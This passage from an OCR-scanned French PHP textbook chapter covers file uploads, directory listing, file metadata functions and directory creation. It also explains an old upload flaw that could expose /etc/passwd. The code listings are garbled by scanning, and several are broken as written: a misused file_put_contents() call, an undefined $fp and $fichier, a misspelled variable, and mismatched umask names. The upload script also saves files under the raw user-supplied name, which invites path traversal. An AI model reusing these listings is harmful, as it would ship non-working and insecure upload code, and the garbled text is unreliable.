presente dans le Listing 17.1. 

Listing 17.1 : depot.html — Formulaire HTML pour le depot de fichiers 



<html> 
<head> 

<title>Administration - depot de f ichiers</title> 
</head> 
<body> 

<h1>Depot de nouveaux f ichiers</h1> 

<form action="depot.php" method="post" enctype="multipart/form-data"/> 
<div> 

<input type="hidden" name=" MAX_FILE_SIZE " value="1000000" /> 

<label f or="f ichier">Fichier a deposer :</label> 

<input type="file" name="f ichier" id="f ichier" /> 

<input type="submit" value="Envoi du fichier"/> 
</div> 
</f orm> 
</body> 
</html> 



Vous remarquerez que ce formulaire utilise la methode POST. Les depots de fichiers 
fonctionnent aussi avec la methode PUT, supportee par Netscape Composer et Amaya, 
bien qu'il soit dans ce cas necessaire d'apporter de serieuses modifications au code. 
En revanche, la methode GET ne convient pas. 

Ce formulaire presente les particularites suivantes : 

Dans la balise <form>, vous devez definir l'attribut enctype="multipart/f orm 
data" afin d'informer le serveur qu'un fichier accompagnera les informations de 
formulaire normales. 

■ Un champ du formulaire doit definir la taille maximale autorisee pour le fichier 
transfere. Ce champ est cache. II est ici defini de la maniere suivante : 

<input type="hidden" name="MAX_FILE_SIZE" value="1000000" /> 

Ce champ est facultatif car sa valeur peut egalement etre fixee au niveau du serveur. 
S'il est utilise, il doit imperativement porter le nom MAX FILE SIZE. L'attribut 
value fixe la taille maximale (en octets) des fichiers que les internautes seront auto- 
rises a transferer. Nous avons ici fixe celle-ci a 1 000 000 d' octets (soit a peu pres 
1 megaoctet), mais vous pouvez l'augmenter ou la diminuer en fonction des besoins 
de votre application. 

■ Vous devez utiliser une balise input de type file, comme ici : 
<input name="f ichier" type="file" /> 
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Vous pouvez choisir n'importe quelle valeur pour l'attribut name (le nom du fichier), 
mais ne l'oubliez pas car vous en aurez besoin plus tard pour acceder au fichier dans 
le script PHP de reception. 

— Attention 

Avant de poursuivre, il convient de signaler que certaines versions de PHP presentaient des 
failles de securite dans le code implementant le depot de fichiers. Si vous decidez d'utiliser 
le depot de fichiers sur un serveur en production, assurez-vous que votre version de PHP est 
a jour et informez-vous regulierement sur la sortie de correctifs. 

Ce qui precede ne doit pas vous dissuader d'employer une fonctionnalite aussi appreciable. 
II s'agit avant tout de vous inciter a la prudence lors de I'ecriture de votre code et aussi 
d'envisager de limiter les depots de fichiers, par exemple, aux administrateurs du site et aux 
responsables de contenus. 



Ecriture du code PHP pour le traitement du fichier 

L' denture du code PHP permettant de recuperer le fichier est assez simple. 

Lorsque le fichier est depose, il est brievement place dans le repertoire temporaire indi- 
que par la directive upload tmp dir de votre fichier php.ini. Comme l'indique le 
Tableau 17.1, il s'agit du repertoire temporaire par defaut du serveur si cette directive 
n'est pas initialisee. Si vous ne deplacez pas, ne copiez pas ou ne renommez pas le 
fichier avant que votre script ne termine son execution, il sera supprime a la fin du 
script. 

Les donnees que vous devez gerer dans votre script PHP sont stockees dans le tableau 
superglobal $ FILES. Si register globals est activee, vous pouvez egalement acceder 
aux informations via des noms de variables directs. Toutefois, il s'agit probablement de 
la situation pour laquelle il est le plus important de desactiver register globals ou, en 
tout cas, d'agir comme si elle l'etait et d'utiliser le tableau superglobal en ignorant les 
variables globales. 

Les entrees de $ FILES seront stockees avec le nom de la balise <f ile> de votre formu- 
laire HTML. L element de votre formulaire etant nomme fichier, ce tableau contiendra 
les elements suivants : 

La valeur stockee dans $ FILES[ 'fichier' ] [ 'tmp name' ] correspond a l'empla- 
cement ou le fichier a ete temporairement stocke sur le serveur web. 

La valeur stockee dans $ FILES[ ' fichier '][ 1 name ' ] correspond au nom du 
fichier sur le systeme de l'utilisateur. 

La valeur stockee dans $ FILES [ 'fichier' ] [ 'size' ] correspond a la faille du 
fichier en octets. 
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■ La valeur stockee dans $ FILES[ ' fichier ' ] [ 'type' ] correspond au type MIME 
du fichier - par exemple text /plain ou image /gif. 

■ La valeur stockee dans $ FILES[ ' fichier '][' error ' ] vous donnera les codes 
d'erreur associes au depot du fichier. Cette fonctionnalite a ete ajoutee dans 
PHP 4.2.0. 

Puisque nous connaissons 1' emplacement et le nom du fichier, nous pouvons le copier a 
un autre endroit qui nous convient mieux. A la fin de 1' execution du script, le fichier 
temporaire etant supprime, il est imperatif de le deplacer ou de le renommer si Ton 
souhaite le conserver. 

Dans notre exemple, les fichiers transferes serviront a alimenter un forum en articles. 
Par consequent, nous eliminerons toute balise eventuellement contenue dans les fichiers 
deposes et nous placerons ceux-ci dans un repertoire plus approprie. Le script effectuant 
ce traitement est presente dans le Listing 17.2. 

Listing 17.2 : depot.php — Script PHP recuperant les fichiers deposes via le formulaire 
HTML 



<html> 
<head> 

<title>Depot . . .</title> 
</head> 
<body> 

<h1>Depot de fichier. . .</h1> 
<?php 



if ($_FILES[ 'fichier' ][ 'error' ] > 0) { 
echo 1 Probleme : ' ; 

switch ($_FILES[ 'fichier' ][ 1 error' ] ) { 
case 1: echo 'Le fichier depasse upload_max_f ilesize ' ; break; 
case 2: echo 'Le fichier depasse max_f ile_size ' ; break; 
case 3: echo 'Depot incomplet'; break; 
case 4: echo "Le depot n'a pas ete effectue"; break; 
case 6: echo "Depot impossible : vous n'avez pas indique de 

repertoire temporaire"; break; 
case 7: echo "Echec du depot : impossible d'ecrire sur le 
disque."; break; 

} 

exit; 



// Le fichier possede-t-il le bon type MIME ? 

if ($_FILES[ 'fichier' ][ 'type' ] != 'text/plain') { 

echo "Probleme : le fichier n'est pas du text brut"; 

exit; 

} 

// Placement du fichier a 1 ' emplacement desire 
$fichier = ' /depots/ '. $_FILES[ ' fichier '][' name ' ] ; 

if (is_uploaded_f ile($_FILES[ ' fichier '][' tmp_name ']) ) { 



424 Partie IV 



Techniques PHP avancees 



if ( ! move_uploaded_f ile($_FILES[ ' f ichier ' ] [ 1 tmp_name ' ] , $fichier)) { 
echo "Probleme : Impossible de deplacer le fichier dans son 
repertoire de destination"; 

exit ; 

} 

} 

else 
{ 

echo "Probleme : Attaque possible par le fichier "; 

echo $_FILES[ ' fichier ' ] [ 1 name 1 ] ; 

exit; 

} 

echo ' Le fichier a ete depose correctement . <br /><br />'; 

// Suppression des eventuelles balises HTML et PHP du contenu du fichier. 
$contenu = f ile_get_contents ($f ichier) ; 
$contenu = strip_tags (Scontenu ) ; 
f ile_put_contents($contenu) ; 
fclose ($fp); 

// Affiche ce qui a ete transfere. 

echo ' Previsualisation du contenu du fichier depose : <br /><hr />'; 
echo $contentu; 
echo ' <br /><hr /> 1 ; 

?> 

</body> 
</html> 



II est interessant de constater que l'essentiel de ce script consiste en des controles 
d'erreur. Le transfert de fichiers vers un serveur presente des risques de securite qui 
doivent etre reduits au minimum. C'est la raison pour laquelle le fichier transfere doit 
etre valide le plus soigneusement possible afin de s'assurer que l'affichage de son 
contenu ne presente aucun danger. 

Examinons les differentes sections qui composent ce script. 

Nous commencons par verifier le code d'erreur renvoye dans $ FILES 
[ 'fichier' ] [ 'error' ]. Voici les constantes associees a ces codes et leurs valeurs 
possibles : 

■ UPLOAD ERROR OK, valeur 0, signifie qu'aucune erreur ne s'est produite. 

■ UPLOAD ERR INI SIZE, valeur 1, signifie que la taille du fichier transfere depasse la 
valeur maximale precisee dans php.ini avec la directive upload max f ilesize. 

■ UPLOAD ERR FORM SIZE, valeur 2, signifie que la taille du fichier transfere depasse la 
taille maximale specifiee dans l'element MAX FILE SIZE du formulaire HTML. 

■ UPLOAD ERR PARTIAL, valeur 3, signifie que le fichier n'a ete que partiellement 
transfere. 

UPLOAD ERR NO FILE, valeur 4, signifie qu'aucun fichier n'a ete transfere. 
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■ UPLOAD ERR NO TMP DIR, valeur 6, signifie qu'aucun repertoire temporaire n'a ete 
indique dans php.ini (introduit par PHP 5.0.3). 

■ UPLOAD ERR CANT WRITE, valeur 7, signifie que l'ecriture du fichier sur disque a 
echoue (introduit par PHP 5. 1.0). 

Si vous utilisez une ancienne version de PHP, vous pouvez realiser certains de ces tests 
manuellement en utilisant le code d'exemple cite dans le manuel PHP ou dans les 
anciennes editions de ce livre. 

On verifie egalement le type MIME. Ici, nous souhaitons transferer uniquement des 
fichiers texte et nous testons done le type MIME en nous assurant que 
$ FILES[ ' fichier ' ] [ 1 type ' ] contient text/plain. II ne s'agit en fait que d'une veri- 
fication d'erreur, pas d'une verification de la securite. En effet, le type MIME est deduit 
par le navigateur de l'utilisateur en utilisant l'extension du fichier, puis est passe a votre 
serveur. S'il y avait un interet a passer un faux type, rien n'empecherait un utilisateur 
malveillant de le faire. 

Ensuite, le script determine si le fichier a ouvrir a reellement ete transfere et s'il ne 
s'agit pas d'un fichier local comme /etc/passwd. Nous reviendrons sur ce point un peu 
plus loin. 

Si tous ces tests sont effectues avec succes, le fichier est copie dans le repertoire reserve 
aux depots. Dans le cas present, nous nous servons du repertoire depots qui est situe en 
dehors de l'arborescence des documents web et qui constitue, par consequent, un bon 
emplacement pour conserver les fichiers a inclure. 

Le fichier est ensuite ouvert, nettoye de ses eventuelles balises HTML ou PHP avec la 
fonction strip tags( ), puis reecrit. 

Enfin, le contenu du fichier est affiche dans le navigateur de l'utilisateur afin d'informer 
celui-ci du bon deroulement du transfert de fichier. 

Le resultat de l'execution de ce script est montre a la Figure 17.2. 



Figure 17.2 

Une fois que le fichier a 
ete copie et reformate, 
il est affiche dans le navi- 
gateur de l'utilisateur, 
pour confirmer le bon 
deroulement du transfert. 
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En septembre 2000, on apprenait qu'une faille de securite pouvait etre exploitee pour 
tromper un script de depot de fichiers de maniere a l'amener a traiter un fichier local 
comme s'il s'agissait d'un fichier transfere. Cet exploit a ete documente sur la liste de 
diffusion BUGTRAQ. Vous trouverez les conseils officiels permettant de parer cette 
menace dans l'une des nombreuses archives de BUGTRAQ, par exemple a l'URL 
http://lists.insecure.org/bugtraq/2000/Sep/0237.html. 

Pour garantir que vous n'etes pas vulnerable, le script du Listing 17.2 utilise les fonc- 
tions is uploaded file() et move uploaded () pour s'assurer que le fichier traite a 
bien ete transfere et n'est pas un fichier local comme /etc/pas swd. Ces fonctions sont 
disponibles depuis la version 4.0.3 de PHR 

Si votre script de gestion du depot de fichiers n'a pas ete ecrit avec suffisamment de 
precaution, un visiteur malveillant pourrait fournir un nom de fichier temporaire et 
amener ainsi votre script a le traiter comme s'il s'agissait d'un fichier transfere. La 
plupart des scripts de depot de fichiers affichant en retour a l'utilisateur les donnees 
transferees ou les enregistrant a un emplacement a partir duquel ces donnees pourront 
etre chargees, cette faille peut done permettre a des intrus d'acceder a tous les fichiers 
lisibles par le serveur. Parmi les fichiers exposes peuvent figurer des fichiers tres sensi- 
bles comme /etc/passwd et du code source PHP contenant des mots de passe pour les 
acces a la base de donnees. 

Problemes frequents 

Lors des operations de depot de fichiers sur un serveur, vous devez garder a l'esprit les 
points suivants : 

B L exemple precedent suppose que les utilisateurs ont ete authentines a un moment 
ou a un autre. Vous devez eviter de laisser tout un chacun deposer des fichiers sur 
votre site. 

■ Si vous autorisez malgre tout des utilisateurs non authentines a deposer des fichiers 
sur votre serveur, vous avez tout interet a vous montrer plutot paranoiaque en ce qui 
concerne leur contenu. Vous devez ainsi absolument empecher qu'un script 
malveillant puisse etre transfere et execute sur votre serveur. II faut done faire atten- 
tion non seulement au type et au contenu du fichier, comme dans cet exemple, mais 
egalement au nom du fichier. II est conseille de renommer les fichiers transferes 
avec des noms "inoffensifs". 

■ Pour limiter les risques de voir les utilisateurs "surfer" dans les repertoires de votre 
serveur, utilisez la fonction basename ( ) pour modifier les noms des fichiers qui arri- 
vent sur le serveur. Cette fonction supprime en effet le chemin faisant partie du nom 
de fichier qui lui est passe en parametre, qui est une attaque classique utilisee pour 
deposer un fichier dans un repertoire different de celui par defaut. 
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Voici un exemple d'utilisation de cette fonction : 
<?php 

$chemin = "/home/httpd/html/index.php" ; 

$fichier1 = basename($chemin) ; 

$fichier2 = basename ($chemin , ".php"); 

print $fichier1 . "<br/>"; // Affiche "index. php" 

print $fichier2 . "<br/>"; // Affiche "index" 

?> 

■ Si vous utilisez une machine Windows, veillez a bien utiliser \ \ ou / au lieu du 
caractere \ normalement employe dans les chemins d'acces aux fichiers. 

■ L'utilisation du nom de fichier fourni par l'utilisateur comme on l'a fait ici peut 
poser un grand nombre de problemes. Le plus evident tient au risque que des 
fichiers existants puissent etre accidentellement ecrases si un utilisateur transfere 
un fichier possedant le meme nom qu'un fichier existant. L'un des autres risques, 
moins evident, tient a ce que les differents systemes d' exploitation et parametres 
regionaux et linguistiques permettent d'utiliser differents jeux de caracteres valides 
dans les noms de fichiers. Un fichier transfere peut done posseder un nom de fichier 
contenant des caracteres invalides sur votre systeme. 

■ Si vous rencontrez des problemes avec le transfert de fichiers, verifiez le contenu de 
votre fichier php.ini. La directive upload tmp dir doit y etre definie pour pointer 
sur un repertoire auquel vous avez acces. Peut-etre vous faudra-t-il aussi definir 
memory limit pour pouvoir effectuer des transferts de fichiers volumineux (cette 
directive determine la taille de fichier maximale, en octets, qui peut etre acceptee). 
Apache possede egalement des delais configurables et des limites de taille de tran- 
saction qui peuvent valoir la peine d'etre examines si vous rencontrez des difficultes 
avec les transferts volumineux. 

Utilisation des fonctions de manipulation des repertoires 

Une fois que des utilisateurs ont depose des fichiers, il peut leur etre tres utile de visua- 
liser les donnees qui ont ete transferees et de manipuler le contenu de ces fichiers. PHP 
offre un ensemble de fonctions de manipulation des repertoires et du systeme de 
fichiers permettant de fournir cette fonctionnalite. 

Lecture du contenu de repertoires 

Nous allons commencer par implementer un script permettant de parcourir des repertoi- 
res pour explorer le contenu qui a ete depose. Avec PHP, la navigation dans des reper- 
toires est tres simple a mettre en oeuvre. Le Listing 17.3 contient un script simple qui 
peut etre utilise a cette fin. 
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Listing 17.3 : parcours_rep.php — Parcours du repertoire contenant les f ichiers deposes 



<html> 
<head> 

<title>Parcours de repertoires</title> 
</head> 
<body> 

<h1>Parcours</h1> 
<?php 

$rep_courant = '/depots/'; 
$rep = opendir($rep_courant) ; 

echo "<p>Le repertoire des depots est $rep_courant</p>" ; 
echo '<p>Contenu du repertoire :</p><ul>'; 
while (false !== ($fichier = readdir($rep) ) ) { 

// Supprime les deux entrees . et . . 

if ($fichier != "." && $fichier != "..") { 
echo "<li>$f ichier</li>" ; 

} 

} 

echo ' </ul> ' ; 
closedir($rep) ; 

?> 

</body> 
</html> 



Ce script met en ceuvre les fonctions opendir ( ), closedir( ) et readdir( ). 

La fonction opendir ( ) s'utilise pour ouvrir un repertoire en lecture, exactement comme 
f open ( ) ouvre des fichiers. Au lieu de passer un nom de fichier a la fonction opendir ( ) , il 
faut lui passer un nom de repertoire : 

$rep = opendir($rep_courant) ; 

opendir () renvoie un descripteur de repertoire, tout comme fopen() renvoie un 
descripteur de fichier. 

Une fois qu'un repertoire est ouvert, vous pouvez y lire le nom des fichiers qui y sont 
contenus en appelant la fonction readdir ($rep), comme on le montre dans l'exemple 
du Listing 17.3. Cette fonction renvoie false lorsqu'il n'y a pas (ou plus) de fichier a 
lire (elle renverra egalement false en presence d'un fichier nomme "0") ; pour prendre 
en compte cette situation particuliere, on effectue le test suivant : 

while (false !== ($fichier = readdir($rep) ) ) 

Lorsque la lecture d'un repertoire est terminee, on appelle la fonction closedir ($rep) 
pour mettre un terme a 1' operation de lecture. La encore, cette fonction est comparable 
a son equivalent pour la fermeture d'un fichier, f close ( ) . 
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Un exemple de resultat obtenu apres l'execution du script du Listing 17.3 est montre a 
la Figure 17.3. 



Figure 17.3 

L'affichage du contenu 
du repertoire montre tous 
les fichiers enregistres 
dans le repertoire indique. 
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Parcours de repertoire 

Lc rfipcrtoirc dcs depots est depots/ 
Contenu du repertoire : 

• machin.txt 

• prcssc.txt 



Generalement, la liste de la Figure 17.3 contiendra egalement les entrees . (le repertoire 
courant) et . . (le repertoire de niveau superieur dans l'arborescence de repertoires), mais 
nous avons ici supprime ces deux entrees a l'aide de cette ligne de code : 

if ($f ichier != "." && $fichier != "..") 

Si vous permettez de parcourir les repertoires avec un mecanisme comme celui-ci, il 
peut etre judicieux de restreindre les repertoires qui peuvent etre visites, afin qu'un 
utilisateur ne puisse pas parcourir le contenu des repertoires situes dans des zones 
normalement inaccessibles. 

rewinddir ($rep) est une fonction apparentee aux fonctions precedentes qui se revele 
parfois bien utile. Elle replace le pointeur de repertoire tout au debut du repertoire 
explore. 

La classe dir fournie par PHP constitue une autre possibilite. Elle est dotee des proprietes 
handle et path et des methodes read ( ) , close ( ) et rewind ( ) qui offrent des fonction- 
nalites identiques a celles des fonctions que nous venons de decrire. 

Le Listing 17.4 presente une reecriture de l'exemple precedent en utilisant la classe dir. 

Listing 17.4 : parcours_rep2.php — Utilisation de la classe dir pour afficher le contenu 
d'un repertoire 



<html> 
<head> 

<title>Parcours de repertoires</title> 
</head> 
<body> 

<h1>Parcours</h1> 
<?php 

$rep = dir( "/depots/ ") ; 
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echo "<p>Le descripteur est $rep->handle</p>" ; 

echo "<p>Le repertoire de depot est $rep->path</p>" ; 

echo '<p>Contenu du repertoire :</p><ul>'; 

while (false !== ($fichier = $rep->read ( ) ) ) { 
// Supprime les deux entrees . et . . 
if ($fichier != "." && $fichier != "..") { 
echo "<li>$f ichier</li>" ; 

} 

} 

echo ' </ul> ' ; 
$rep->close( ) ; 

?> 

</body> 
</html> 



Dans ces exemples, les noms de fichiers n'apparaissent pas dans un ordre particulier. Si 
vous souhaitez qu'ils soient tries, vous devrez utiliser la fonction scandir ( ) introduite 
par PHP 5. Cette fonction stocke les noms de fichiers dans un tableau et les trie par 
ordre alphabetique croissant ou decroissant, comme dans le Listing 17.5. 

Listing 17.5: scandir.php — Utilisation de la fonction scandir() pour trier alphabetiquement 
les noms de fichiers 



<html> 
<head> 

<title>Parcours de repertoires</title> 
</head> 
<body> 

<h1>Parcours</h1> 
<?php 

$rep = ' /depots/ ' ; 
$fichiers1 = scandir($rep) ; 
$fichiers2 = scandir($rep, 1); 

echo "<p>Le repertoire des depots est $rep</p>"; 

echo '<p>Contenu du repertoire par ordre alphabetique croissant  : 
</p><ul> ' ; 

f oreach ($f ichiersl as $fichier) { 

if($fichier != "." && $fichier ! = "..") { 
echo "<li>$f ichier</li>" ; 

} 

} 

echo 1 </ul> ' ; 

echo "<p> Le repertoire des depots est $rep</p>"; 

echo '<p> Contenu du repertoire par ordre alphabetique decroissant  : 
</p><ul> 1 ; 
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f oreach ($f ichiers2 as $fichier) { 

if ($fichier != "." && $fichier != "..") { 
echo "<li>$f ichier</li>" ; 

} 

} 

echo ' </ul> ' ; 
?> 

</body> 
</html> 

Obtention d'informations sur le repertoire courant 

II est possible d'obtenir des informations supplementaires sur le chemin d'acces d'un 
fichier. 

Les fonctions dir name ($chemin) et basename ($chemin) renvoient, respectivement, la 
partie du chemin d'acces representant le nom du repertoire contenant le fichier et la partie 
du chemin d'acces representant le nom du fichier. Ces fonctions peuvent etre interes- 
santes dans le cadre d'une application d'exploration des repertoires et c'est particuliere- 
ment vrai lorsque la structure des repertoires est sophistiquee et qu'elle repose sur 
l'emploi de noms de repertoires et de fichiers dotes d'une signification particuliere. 

Grace a la fonction disk free space ($chemin), nous pourrions ajouter au script 
precedent un mecanisme indiquant la quantite d'espace disponible pour le stockage des 
fichiers deposes. Lorsque Ton passe en parametre a cette fonction un chemin d'acces a 
un repertoire, elle renvoie le nombre d'octets disponibles sur le disque (Windows) ou 
dans le systeme de fichiers (Unix) qui contient ce repertoire. 

Creation et suppression de repertoires 

PHP permet non seulement de lire passivement des informations relatives aux repertoires, 
mais aussi de creer et de supprimer des repertoires, respectivement avec les fonctions 
mkdir ( ) et rmdir ( ) . Cependant, on ne peut creer et supprimer des repertoires que dans 
les chemins d'acces accessibles a l'utilisateur qui execute le script. 

La mise en ceuvre de la fonction mkdir ( ) est un peu delicate. Cette fonction prend deux 
parametres : le chemin d'acces au repertoire a creer (qui contient le nom du nouveau 
repertoire) et les permissions a associer a ce repertoire. Voici un exemple : 

mkdir( "/tmp/tests" , 0777); 

Toutefois, les permissions que vous avez indiquees ne seront pas necessairement accor- 
dees car les veritables permissions seront le resultat d'un ET logique entre celles que 
vous avez indiquees et 1' inverse du "umask" courant. Par exemple, si le umask a la 
valeur 022, les permissions accordees ici seront 0755. 
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Pour eviter ce masquage, vous pouvez reinitialiser le umask avant de creer un reper- 
toire : 

ancien_umask = umask(0); 
mkdir("/tmp/tests" , 0777); 
umask($oldumask) ; 

Ce code utilise la fonction umask(), qui permet de verifier et de modifier la valeur 
courante du umask. umask ( ) definit le umask a la valeur qui lui a ete passee en parame- 
tre et renvoie l'ancienne valeur de umask. Sans parametre, umask ( ) renvoie uniquement 
la valeur courante de umask. 

Notez que la fonction umask ( ) n'a aucun effet sur un systeme Windows. 

La fonction rmdir() supprime le repertoire qui lui est passe en parametre. En voici 
deux exemples d'utilisation : 

rmdir( "/tmp/tests " ) ; 

et 

rmdir( "c: WtmpW tests" ) ; 
rmdir ( ) ne peut supprimer que des repertoires vides. 

Interaction avec le systeme de fichiers 

Avec PHP, vous pouvez consulter et obtenir des informations sur des repertoires, mais 
egalement interagir et obtenir des informations sur les fichiers conserves sur le serveur 
web. Nous avons vu precedemment comment ecrire et lire dans des fichiers. PHP offre 
de nombreuses autres fonctions pour la manipulation des fichiers. 

Obtention d'informations sur les fichiers 

La partie du script qui affiche la liste du contenu d'un repertoire peut etre modinee de la 
maniere suivante : 

while (false !== ($fichier = readdir ($rep) ) ) { 
echo "<href =\ "details_f ichier . php?f ile=$f ichier\ ">$f ichier</a><br />" ; 

} 

Nous pouvons ensuite creer le script details Jichier.php pour obtenir plus d'informations 
sur un fichier. Ce script est donne au Listing 17.6. 



— Attention 

Les fonctions posix getpuwuid( ), f ileowner( ) et f ilegroup( ) utilisees dans ce script ne 
sont pas prises en charge (ou du moins pas de maniere fiable) sous Windows. 
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Listing 17.6 : details_fichier.php — Mise en ceuvre de fonctions renseignant sur le statut 
d'un fichier 



<html> 
<head> 

<title>Details sur les fichiers </title> 
</head> 
<body> 
<?php 

$rep_courant = '/depots/'; 

$fichier = basename($f ichier) ; // suppression du chemin pour des 

// raisons de securite. 

echo "<h1>Details du fichier $f ichier</h1>" ; 
$fichier = $rep_courant . $fichier; 

echo "<h2>Inf ormations sur le f ichier</h2>" ; 
echo "Dernier acces : ".date("j F Y H:i", fileatime ($f ichier) ) 
. "<br />"; 

echo "Derniere modification : ".date("j F Y H:i", filemtime ($f ichier) ) 
. "<br />" ; 

$utilisateur = posix_getpwuid(fileowner($f ichier) ) ; 

echo "Proprietaire : " . $utilisateur [ ' name ' ] . "<br />"; 

$groupe = posix_getgrgid(filegroup($f ichier) ) ; 
echo "Groupe : " . $groupe[ ' name ' ] ."<br />"; 

echo "Permissions : " . decoct(fileperms($fichier) ) . "<br />"; 

echo "Type : " . filetype ($f ichier ) . "<br />"; 

echo "Taille : " . filesize($f ichier) . " octets<br />"; 



echo '<h2>Tests sur le f ichier</h2> ' ; 

echo "is_dir : " . (is_dir($fichier)? 'true' : ' false '). "<br />"; 
echo " is_executable : " . (is_executable($fichier)? 'true' : 'false') 

. "<br />"; 

echo "is_file : " . (is_file($f ichier)? 'true' : ' false '). "<br/>" ; 
echo "is_link : " . (is_link($f ichier)? 'true' : ' false '). "<br />"; 
echo "is_readable : " . (is_readable($fichier)? 'true' : 'false') 

. "<br />"; 

echo "is_writable : " . (is_writable($fichier)? 'true' : 'false') 

. "<br />"; 



?> 

</body> 
</html> 
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La Figure 17.4 donne un exemple d'execution du Listing 17.6. 



Figure 17.4 

Le script du Listing 17.6 
permet d'acceder aux 
informations du systeme 
de fichiers qui se rapportent 
a un fichier specif ique. 
Notez que les permissions 
sont indiquees au format 
octal. 



o n n 



Details sur les fichiers 



CD 
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Details du fichier 



Informations sur le fichier 

Dernier acccs : S October 2008 20:53 

Dernierc modification : 8 October 2008 20:49 

Proprictaire : jaco 

Groupe : staff 

Permissions : 40755 

Type : dir 

Taillc: 170 octels 

Tests sur le fichier 



is_dir : true 
is_cxccutable : true 
is_file : false 
isjink : false 
is readable : true 
is_writablc : false 

Termine ^ 



Examinons ce que fait chacune des fonctions utilisees dans le script du Listing 17.6. 

Comme nous l'avons deja mentionne, la fonction basename ( ) fournit le nom du fichier 
sans nom de repertoire (la fonction dirname ( ) fournirait, quant a elle, le nom du reper- 
toire sans le nom du fichier). 

Les fonctions f ileatime ( ) et f ilemtime ( ) renvoient la date et l'heure ("l'horodatage") 
respectivement du dernier acces au fichier et de la derniere modification apportee au 
fichier. Ces dates et heures sont reformatees ici avec la fonction date( ), de sorte a en 
faciliter la lecture. Avec certains systemes d' exploitation, ces deux fonctions renverront 
la meme valeur (comme ici) ; cela depend des informations enregistrees par le systeme. 

Les fonctions fileowner() et filegroupO renvoient, respectivement, l'ID utilisateur 
(uid, pour user ID) et l'ID de groupe (gid pour group ID) du fichier. Ces ID peuvent 
etre convertis en noms via les fonctions posix getpwuid( ) et posix getgrgid( ), afin 
d'en faciliter la lecture. Ces dernieres prennent respectivement le uid et le gid comme 
parametre et renvoient un tableau associatif contenant les informations relatives a 
l'utilisateur ou au groupe, dont le nom de l'utilisateur ou du groupe (que nous avons 
utilises dans notre script). 

La fonction fileperms() renvoie les permissions sur le fichier. Dans le Listing 17.6, 
ces permissions sont reformatees en octal au moyen de la fonction decoct ( ), afin de 
leur donner un format plus familier aux utilisateurs d'Unix. 
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La fonction f iletype( ) renvoie des informations sur le type du fichier examine. Les 
resultats possibles sont : f if o, char, dir, block, link, file et unknown. 

La fonction filesize() renvoie la taille du fichier en octets. 

Le second ensemble de fonctions mises en ceuvre - is dir(), is executable (), 
is file(),is link(),is readable () et is writ able( )- permet de tester les differents 
attributs du fichier. Toutes ces fonctions renvoient true ou false. 

On aurait egalement pu appeler la fonction stat( ) pour obtenir une grande partie de 
ces informations. En effet, lorsqu'on lui passe un fichier en parametre, cette fonction 
renvoie un tableau rassemblant des informations comme celles qui sont renvoyees par 
les fonctions citees plus haut. La fonction lstat ( ) est identique a la fonction stat ( ) , 
mais pour les liens symboliques. 

Toutes les fonctions informant du statut d'un fichier se revelent couteuses en termes de 
temps d'execution. C'est pourquoi les donnees qu'elles renvoient sont placees dans la 
memoire cache. Si vous souhaitez obtenir des informations sur le statut d'un fichier 
donne, avant et apres sa modification, appelez la fonction : 

clearstatcache( ) ; 

pour effacer les resultats precedents. Pour, par exemple, utiliser le script precedent 
avant et apres avoir modifie le fichier, il faut commencer par appeler cette fonction afm 
de s' assurer que les informations renvoyees par les differentes fonctions seront bien a 
jour. 

Modification des proprieties d'un fichier 

Vous pouvez non seulement visualiser les proprietes d'un fichier, mais egalement les 
modifier. 

Les fonctions chgrp(fic/7ier, groupe), chmod( fichier, permissions) et 
chown( fichier, utilisateur) se comportent de la meme maniere que leurs homolo- 
gues Unix. Aucune de ces fonctions n'est utilisable sous Windows (sauf chown ( ) , mais 
elle renvoie toujours true). 

La fonction chgrp( ) permet de modifier le groupe d'un fichier. Elle ne peut toutefois 
s'utiliser que pour changer un groupe en un autre groupe dont l'utilisateur est membre, 
a moins que l'utilisateur ne soit root. 

La fonction chmod() permet de modifier les permissions d'un fichier. Les nouvelles 
permissions doivent lui etre passees en parametre de la meme maniere que pour la 
commande chmod d'Unix. Prefixez les permissions avec un "0" (zero), pour indiquer 
qu'elles sont au format octal, comme dans 1' exemple suivant : 

chmod( ' unfichier.txt ' , 0777); 
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La fonction chown( ) permet de modifier le proprietaire d'un fichier. Elle ne peut etre 
utilisee que si le script est execute en tant que root, ce qui ne devrait jamais se produire 
a moins que vous n'executiez specifiquement le script depuis la ligne de commande 
pour realiser une tache administrative. 

Creation, suppression et emplacement de f ichiers 

PHP offre des fonctions de manipulation du systeme de fichier qui permettent de creer, 
de deplacer et de supprimer des fichiers. 

Vous pouvez creer un fichier, ou changer la date et l'heure de sa derniere modification, 
grace a la fonction touch ( ). Celle-ci est comparable a la commande Unix touch. Son 
prototype est le suivant : 

bool touch (string fichier, [int date [, int unedate]]) 

Si vous passez un fichier existant en parametre a la fonction touch (), sa date et son 
heure de derniere modification seront definies soit sur la date et l'heure courantes, soit 
sur les valeurs indiquees dans le second parametre. Si vous voulez passer ce second 
parametre, vous devez l'exprimer sous la forme d'une etiquette temporelle. Si le fichier 
passe en parametre n'existe pas, la fonction touch () le cree. L'heure a laquelle ce 
fichier aura ete examine sera egalement modifiee : par defaut, il s'agira de l'heure 
systeme courante ou, le cas echeant, de 1' instant indique dans le parametre (facultatif) 
unedate. 

Pour supprimer des fichiers, utilisez la fonction unlink ( ) (notez que cette fonction ne 
porte pas le nom delete, qui ne fait pas partie des mots reserves en PHP) : 

unlink($nomf ichier) ; 

Les fonctions copy ( ) et rename ( ) permettent, respectivement, de copier et de deplacer 
des fichiers. Elles s'utilisent de la maniere suivante : 

copy ($chemin_source , $chemin_destination) ; 
rename ($ancienf ichier, $nouveauf ichier) ; 

Nous avons deja eu recours a la fonction copy ( ) dans le Listing 17.2. 

La fonction rename ( ) a deux emplois en PHP, puisqu'elle permet aussi de deplacer les 
fichiers d'un emplacement a 1' autre et que PHP n' offre pas de fonction move ( ) speciali- 
see pour le deplacement des fichiers. Selon les systemes d'exploitation, rename () 
permet ou non de deplacer un fichier d'un systeme de fichiers a un autre et ecrase ou 
n'ecrase pas les fichiers. Par consequent, assurez-vous des effets de la fonction 
rename ( ) sur votre systeme avant de la mettre en ceuvre. De meme, faites attention au 
chemin d'acces utilise pour le fichier a deplacer. S'il s'agit d'un chemin d'acces relatif, 
il sera traite par rapport a 1' emplacement du script, pas du fichier original. 
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Utilisation de fonctions d'execution de programmes 

Nous arretons la notre etude des fonctions du systeme de fichiers pour examiner les 
fonctions dont nous disposons pour executer des commandes sur le serveur. 

Ces fonctions sont tres utiles lorsque vous voulez fournir un frontal web vers un 
systeme utilisant la ligne de commande. Nous avons, par exemple, deja eu recours a ces 
